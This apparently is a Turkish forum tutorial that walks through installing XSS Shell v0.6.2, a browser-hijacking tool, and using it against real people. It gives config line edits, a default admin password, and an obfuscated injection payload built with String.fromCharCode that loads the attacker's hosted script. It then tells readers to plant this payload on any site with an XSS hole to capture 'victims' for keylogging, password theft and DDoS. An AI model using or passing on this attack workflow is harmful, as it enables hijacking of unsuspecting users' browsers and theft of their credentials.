A
B
C
Ç
D
E
F
G
Ğ
H
I
İ
J
K
L
M
N
O
P
R
S
Ş
T
U
Ü
V
Y
Z
Q
W
X
+ Ekle
XSS Shell-KurulumKullanım

XSS Shell-KurulumKullanım a rel="nofollow" >
Selamun Aleyküm
XSS Shell temel şekilde XSS ataklarını bir seviye daha yukarı taşımak amacı ile geliştirilmiştir.
Gerçek zamanlı olarak saldırılan kişi veya kişileri (nitekim biz kendilerini basitçe zombi diyoruz) kontrol etme ve
enfekte (XSS Shell bulaşmış) olmuş kullanıcıları yönetip onların hakları ile sisteme girme, başka sistemlere saldırma (DDoS),
onları takip etme (keylogger, mouselogger, webshot), şifrelerini çalma gibi eylemlere izin verir.
Ek olarak saldırılan kişi bir defa XSS atağı ile enfekte olduktan sonra ilgili tarayıcı penceresini kapatana kadar saldırganın kontrolü halinde kalacaktır.
XSS Shell birden fazla zombiyi gerçek zamanlı yönetebilir ve komut gönderebilir.
Bende Sizlere Bu Konumda XSS Shell kurulumu ve kullanımını anlatacağım.

Burdan
indirdiğimiz zip dosyası içerisinden




XSSShell - v0.6.2 klasörünü açıyoruz .

xsshell.asp dosyasının 71. satırındaki, "var SERVER ="" kısmını http://siteniz.com olarak değiştiriyoruz.
2. olarak admin/db.asp dosyasının 23.satırındaki "Const DBPATH = " kısmını kendimize göre ayarlıyoruz.
3. olarakta simple_victim klasöründeki default.asp dosyasının 98. satırındaki http://www.xssshelltest.com:60000 yerine http://siteniz.com/xsshelldizini şeklinde değiştiriyoruz.
değiştirmelerimiz bittiten sonra , bütün dosyalarımızı asp destekli bir hosta upload ediyoruz ve
siteniz.com/admin kısmına giriyoruz , ekran şöyle olacak.

şifre kısmına "w00t" yazıyoruz.
giriş yaptıktan sonraki ekran şöyle olacak ,

şimdi
sample_victim/default.asp dosyasının 98. satırındaki
<script src= "http://sitenizxssdizini/xssshell></script> kodunu kopyalıyoruz ve a target=_blank href=http://xss.9f">Bu adrese gidiyoruz.

   
   Enter string here yazan kısıma kopyaladıgımız kodu yapıştırıyoruz ve calcuteye basıyoruz.
      
      gordugunuz uzere kodumuz oluştu şimdi herhangi bi notepad vs. gibi araç ile rakamlar arasındaki boşluğu siliyoruz,
      şöyle olacak stringimiz :   60, 115, 99, 114, yerine 60,115,99,114, gibi olacak.
      yaptıktan sonra ,
      "><script>document.write(String.fromCharCode(BURAYA KODUNUZ GELECEK.));</script>
      buraya kodunuz gelecek kısmındaki yere kodumuzu yazıyoruz ve kodumuzu bir yere kopyalıyoruz .
      Kurbanları XSS shell’e düşürmek için kullanacağımız kod budur.
      şimdi herhangi bir xss açığı olan siteye girip kodumuzu yazıyoruz ve enterlıyoruz.
      gördüğünüz gibi kodumuz çalıştı ve browserin veri alışverişi yaptığı sayfalar kısmında sitemiz gözüktü.
        
        xss shellimizin admin paneline geldiğimizde görüntü şu şekilde olacaktır ,
         
          Kurbanımızı XSS Shelle düşürdük istediğiniz işlemi sağ taraftaki menüden yapabilirsiniz..
          
          CWSENCERHAN

  Ad Soyad
  Yorum